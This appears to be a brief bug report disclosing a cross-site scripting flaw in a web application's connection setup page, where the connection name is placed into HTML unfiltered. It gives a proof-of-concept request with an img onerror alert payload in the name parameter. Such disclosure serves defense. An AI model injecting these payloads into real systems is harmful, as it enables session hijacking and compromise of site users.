in /access/setup?type-conn, in connection name,parameter name will be injected into HTML content with out any filter
```
http://127.0.0.1:8188/access/actionedit
type=conn&ip=localhost&name=localhost'%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&allow=1&showpageinfo=1&pin=1&print=1&autologin=
暂无评论